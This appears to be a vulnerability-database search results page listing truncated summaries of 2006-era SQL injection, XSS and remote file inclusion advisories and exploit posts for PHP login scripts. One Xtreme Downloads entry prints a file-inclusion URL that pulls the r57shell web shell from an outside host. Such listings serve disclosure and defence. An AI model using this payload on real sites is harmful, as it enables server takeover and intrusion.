1444 matches found
CVE-2006-5060
The CVE-2006-5060 entry concerns a cross-site scripting (XSS) vulnerability in Jamroom 3.0.16 (and possibly earlier) within login.php, exploitable via the forgot parameter in the forgot mode. The NVD details a CVSSv2 base score of 5.1 (Medium) with network attack vector, high complexity, no authe...
CVE-2006-4836
SQL injection vulnerability in login.php in DCP-Portal SE 6.0 allows remote attackers to execute arbitrary SQL commands via the username parameter. NOTE: The lostpassword.php and calendar.php vectors are already covered by CVE-2005-3365, and the search.php vector is already covered by CVE-2005-42...
CVE-2006-4836
CVE-2006-4836 affects DCP-Portal SE 6.0 via SQL injection in login.php (username parameter). Describes remote SQL execution risk and notes that lostpassword.php/calendar.php vectors are covered by CVE-2005-3365 and search.php by CVE-2005-4227. No explicit remediation or patch details are provided...
CVE-2006-4705
SQL injection vulnerability in login.php of Timesheet (aka Timesheet.php) 1.2.1 allows remote attackers to execute arbitrary SQL commands via the username parameter. This affects Timesheet 1.2.1 as reported by CVE records. The connected documents specify the vulnerability and payload vector but d...
phpAtm <= 1.21 (include_location) Remote File Include Vulnerabilities
phpAtm <= v1.21 (include_location) Remote File Inclusion Exploit Level : Dangerous Download : http://phpatm.free.fr/ Version : v1.21 Found By: KinSize MHG Security Team Code : include $include_location.'include/conf.php'; exploit:...
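WebspotBlogging login.php Remote SQL Injection Vulnerability
BUGTRAQ ID: 16319 CVECAN ID: CVE-2006-0324 WebspotBlogging is a blog program written in PHP. WebspotBlogging does not properly and sufficiently filter user-submitted parameters; remote attackers can exploit this vulnerability to perform unauthorized database operations and bypass authentication. The login.php script of WebspotBlogging does not sufficiently filter the user-submitted username parameter; a remote attacker can insert specific SQL commands into the input data to gain unauthorized access to the database. WebspotBlogging WebspotBlogging 3.0 WebspotBlogging ---------------...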
Spaminator 1.7 - page Remote File Inclusion
Spaminator 1.7 - page Remote File Inclusion Spaminator 1.7. $page Remote File Include CreW: ToXiC BuG Found By Drago84 SourcE CodE: http://freshmeat.net/redir/spaminator/16281/urltgz/spaminator-1.7.tar.gz Page Affect is: /src/Login.php Problem is include "$page.php"; Path : Declare $page ExpL:...
Spaminator 1.7 - 'page' Remote File Inclusion
Spaminator 1.7. $page Remote File Include CreW: ToXiC BuG Found By Drago84 SourcE CodE: http://freshmeat.net/redir/spaminator/16281/urltgz/spaminator-1.7.tar.gz Page Affect is: /src/Login.php Problem is include "$page.php"; Path : Declare $page ExpL:...
Spaminator 1.7. ($page) Remote File Include
Spaminator 1.7. $page Remote File Include CreW: ToXiC BuG Found By Drago84 SourcE CodE: http://freshmeat.net/redir/spaminator/16281/urltgz/spaminator-1.7.tar.gz Page Affect is: /src/Login.php Problem is include "$page.php"; Path : Declare $page ExpL:...
Spaminator <= 1.7 (page) Remote File Include Vulnerability
Exploit for unknown platform in category web applications ========================================================== Spaminator = 1.7 page Remote File Include Vulnerability ========================================================== Spaminator 1.7. $page Remote File Include CreW: ToXiC BuG Found B...
SolpotCrew Advisory #6 - phpCC - Beta 4.2 (base_dir) Remote File Inclusion
SolpotCrew Community phpCC - Beta 4.2 basedir Remote File Inclusion Download file : http://www.phpcc.at/downloadfile1.html Bug Found By :Solpot a.k.a k. Hasibuan 06-08-2006 contact: [email protected] Website : http://www.solpotcrew.org/adv/solpot-adv-05.txt Greetz: choi , h4ntu , Ibnusina ,...
CVE-2006-3613
Multiple cross-site scripting (XSS) vulnerabilities exist in Chamberland Technology ezWaiter 3.0 Online (and possibly Enterprise Software). The issues allow remote attackers to inject arbitrary web script or HTML via: (1) itemfor (the “Who is this item for?” field) and (2) special (the “Special I...
MyMail 1.0 - 'login.php' Cross-Site Scripting
source: https://www.securityfocus.com/bid/18656/info MyMail is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary script code execute in the browser of an...
CVE-2006-3103
CVE-2006-3103 describes a cross-site scripting (XSS) vulnerability in Bitweaver 1.3, allowing remote attackers to inject arbitrary web script or HTML via (1) the error parameter in users/login.php and (2) the feedback parameter in articles/index.php. The connected records confirm Bitweaver as the...
aWebNews <= 1.0 (login.php) Remote DocumentRoot file disclosure
/ Federico Fazzi, [email protected] / aWebNews <= 1.0 (login.php) Remote DocumentRoot file disclosure / 04/06/2006 5:48 login.php: line 64-68, Bug: -- start -- if ($_GET['page'] == "") $pagetogo = "index.php"; else $pagetogo = $_GET['page']; -- end -- Proof of concept: Open the browser and go at:...
Multiple file include exploits in Xtreme Downloads v.1.0
Multiple file include exploits in Xtreme Downloads v.1.0 script type : Xtreme Downloads v.1.0 bug found by : sweet-devil & black-code team : site-down type : file include exploits : download.php http://www.example.com/path/download.php?root=http://yoursite/r57shell.txt? manager.php...
CVE-2006-2740
Multiple SQL injection vulnerabilities in Epicdesigns tinyBB 0.3 allow remote attackers to execute arbitrary SQL commands via the (1) q parameter in (a) forgot.php, and the (2) username and (3) password parameters in (b) login.php, and other unspecified vectors...
tinyBB <= 0.3 Remote (Include / SQL Injection) Vulnerabilities
Exploit for unknown platform in category web applications ============================================================== tinyBB ICQ: 10072 MSN/Mail: email protected web: www.nukedx.com This exploits works on tinyBB = 0.3 Original advisory can be found at: http://www.nukedx.com/?viewdoc=33...
SQL injection
SQL injection vulnerability in login.php in YourFreeWorld.com Short Url & Url Tracker Script allows remote attackers to execute arbitrary SQL commands via the id parameter...
CVE-2006-2509
The CVE-2006-2509 entry concerns YourFreeWorld.com Short Url & Url Tracker Script. The vulnerable component is login.php, where the id parameter allows SQL injection, enabling remote attackers to execute arbitrary SQL commands. The available references describe the issue as a SQL injection affect...